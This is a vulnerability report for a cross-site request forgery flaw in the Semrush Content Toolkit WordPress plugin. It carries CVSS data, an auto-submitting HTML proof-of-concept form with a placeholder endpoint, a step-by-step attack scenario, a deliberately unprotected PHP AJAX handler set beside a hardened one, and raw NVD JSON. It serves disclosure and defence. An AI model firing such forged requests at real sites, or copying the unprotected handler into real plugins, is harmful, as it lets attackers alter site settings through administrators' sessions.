Security Vulnerability Report

CVE-2025-68082

Published: 2025-12-16 09:16:03
Last Modified: 2026-04-27 19:16:25

Description

Cross-Site Request Forgery (CSRF) vulnerability in SEMrush CY LTD's Semrush Content Toolkit WordPress plugin (slug: semrush-contentshake). The issue affects all versions of Semrush Content Toolkit up to and including 1.1.32 (NVD phrasing: "from n/a through <= 1.1.32"). The NVD record carries the weakness as CWE-352 and, as of the last-modified date above, has the status "Deferred".

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

PR:N with UI:R is the usual CSRF scoring: the attacker needs no account on the target site, but must get an already authenticated user (typically an administrator) to load a page they control. The rated impact is limited to integrity and availability (I:L/A:L); no confidentiality impact is claimed.

Configurations (Affected Products)

No CPE configuration data is available in the NVD record. Affected product:

Semrush Content Toolkit (WordPress plugin) <= 1.1.32

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- CSRF PoC for CVE-2025-68082 -->
<!-- Demonstrates the CSRF weakness class in Semrush Content Toolkit <= 1.1.32.
     The AJAX action name and parameter below are placeholders: this page does
     not identify the vulnerable endpoint, so it must be located by reviewing
     the plugin source. -->
<!DOCTYPE html>
<html>
<head>
  <title>CSRF Attack PoC - CVE-2025-68082</title>
</head>
<body>
  <h1>CSRF PoC for Semrush Content Toolkit</h1>
  <p>This demonstrates the CSRF vulnerability in the WordPress Semrush Content Toolkit plugin &lt;= 1.1.32</p>

  <!-- Example: forging a request to the plugin's settings or content manipulation endpoint -->
  <form id="csrfForm" action="[TARGET_WORDPRESS_SITE]/wp-admin/admin-ajax.php" method="POST">
    <!-- Example action: the actual vulnerable endpoint must be identified -->
    <input type="hidden" name="action" value="semrush_contentshake_save_settings">
    <input type="hidden" name="settings[some_setting]" value="malicious_value">
    <!-- 'security' is the conventional WordPress nonce field; a forged page cannot
         know the real value, so this only works if the handler never verifies it -->
    <input type="hidden" name="security" value="[ANY_VALUE]">
  </form>

  <script>
    // Auto-submit the form when the page loads; the victim's browser attaches
    // its WordPress session cookies to the cross-site POST
    document.getElementById('csrfForm').submit();
  </script>

  <p>If you see this message, the attack form has been submitted.</p>
  <p><strong>Note:</strong> This is a demonstration. Replace [TARGET_WORDPRESS_SITE] with the actual target URL.</p>
  <p><strong>Note:</strong> Identify the actual vulnerable endpoints through code review of the plugin source.</p>
</body>
</html>
```

Attack scenario:

1. Attacker identifies a WordPress site using Semrush Content Toolkit plugin <= 1.1.32.
2. Attacker analyzes the plugin's AJAX endpoints for ones that lack CSRF protection (no nonce check, or a nonce that is read but never verified).
3. Attacker creates a malicious page with the forged request.
4. Attacker tricks an authenticated admin into visiting the page.
5. The browser automatically sends the request with the admin's cookies.
6. The plugin processes the request without proper CSRF validation.
7. The attacker's action is executed with the admin's privileges.

Two practical caveats. First, admin-ajax.php only routes to a wp_ajax_{action} handler when the request carries a valid logged-in session, so the victim must be authenticated at the time of the visit. Second, browsers that treat cookies without a SameSite attribute as SameSite=Lax do not attach them to a cross-site top-level POST, so the PoC as written may not reproduce in those browsers unless the vulnerable handler also accepts GET (in which case a plain link or image tag suffices).
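The PoC above relies on an admin-ajax handler that performs a state change without verifying a nonce. The block below is an added example, not code from the Semrush Content Toolkit plugin or from this advisory: it shows that forgeable WordPress handler pattern next to its hardened form, using the real WordPress API (add_action, check_ajax_referer, current_user_can, wp_create_nonce, wp_localize_script). Every other name in it (the example_csrf_* actions and functions, the option key, the 'security' field name) is hypothetical.

```php
<?php
/**
 * Added example (not the Semrush Content Toolkit's code): the admin-ajax
 * handler pattern behind CWE-352 findings of this kind, forgeable form
 * first, hardened form second. All example_csrf_* names are hypothetical.
 */

// --- Vulnerable pattern -------------------------------------------------
// Registered only for logged-in users (no wp_ajax_nopriv_ twin), but that is
// the only gate: there is no nonce check and no capability check, so a
// cross-site form POSTed from any logged-in victim's browser is processed.
add_action( 'wp_ajax_example_csrf_save_vulnerable', 'example_csrf_save_vulnerable' );
function example_csrf_save_vulnerable() {
    $value = sanitize_text_field( wp_unslash( $_POST['value'] ?? '' ) );
    update_option( 'example_csrf_setting', $value ); // state change, unprotected
    wp_send_json_success( array( 'saved' => $value ) );
}

// --- Hardened pattern ---------------------------------------------------
add_action( 'wp_ajax_example_csrf_save', 'example_csrf_save_hardened' );
function example_csrf_save_hardened() {
    // 1. Anti-CSRF token. The nonce is bound to the action name and to the
    //    current user's session, so a third-party page cannot supply a valid
    //    one. On failure check_ajax_referer() ends the request with HTTP 403.
    check_ajax_referer( 'example_csrf_save', 'security' );

    // 2. Authorization. A valid nonce only proves the request originated from
    //    a page this site served to this user; it does not prove the user may
    //    change settings. Check the capability separately (wp_send_json_error
    //    terminates the request).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }

    $value = sanitize_text_field( wp_unslash( $_POST['value'] ?? '' ) );
    update_option( 'example_csrf_setting', $value );
    wp_send_json_success( array( 'saved' => $value ) );
}

// --- Issuing the nonce to the legitimate admin page ----------------------
// The plugin's own JavaScript receives the nonce through wp_localize_script()
// and sends it back as the 'security' field. A forged cross-site page never
// sees this value, which is what makes the hardened handler unforgeable.
add_action( 'admin_enqueue_scripts', 'example_csrf_enqueue' );
function example_csrf_enqueue( $hook ) {
    wp_enqueue_script(
        'example-csrf-admin',
        plugins_url( 'admin.js', __FILE__ ), // hypothetical script path
        array( 'jquery' ),
        '1.0',
        true
    );
    wp_localize_script( 'example-csrf-admin', 'exampleCsrf', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'example_csrf_save' ),
    ) );
}
```

The legitimate admin.js would POST `action=example_csrf_save`, `security=<exampleCsrf.nonce>` and `value=...` to exampleCsrf.ajaxUrl; the PoC's `[ANY_VALUE]` fails the first line of the hardened handler. When triaging a plugin for this class, enumerate every add_action('wp_ajax_...') callback and confirm that each one calls check_ajax_referer() or wp_verify_nonce() and a current_user_can() check before any update_option(), database write or file operation; a handler that reads $_POST['security'] but never passes it to a verification function is still vulnerable.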

References

Weakness: CWE-352 (Cross-Site Request Forgery)

Patchstack advisory: https://patchstack.com/database/Wordpress/Plugin/semrush-contentshake/vulnerability/wordpress-semrush-content-toolkit-plugin-1-1-32-cross-site-request-forgery-csrf-vulnerability?_s_id=cve
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-68082",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-16T09:16:03.223",
    "lastModified": "2026-04-27T19:16:24.973",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Cross-Site Request Forgery (CSRF) vulnerability in SEMrush CY LTD Semrush Content Toolkit semrush-contentshake allows Cross Site Request Forgery.This issue affects Semrush Content Toolkit: from n/a through <= 1.1.32."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-352"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://patchstack.com/database/Wordpress/Plugin/semrush-contentshake/vulnerability/wordpress-semrush-content-toolkit-plugin-1-1-32-cross-site-request-forgery-csrf-vulnerability?_s_id=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```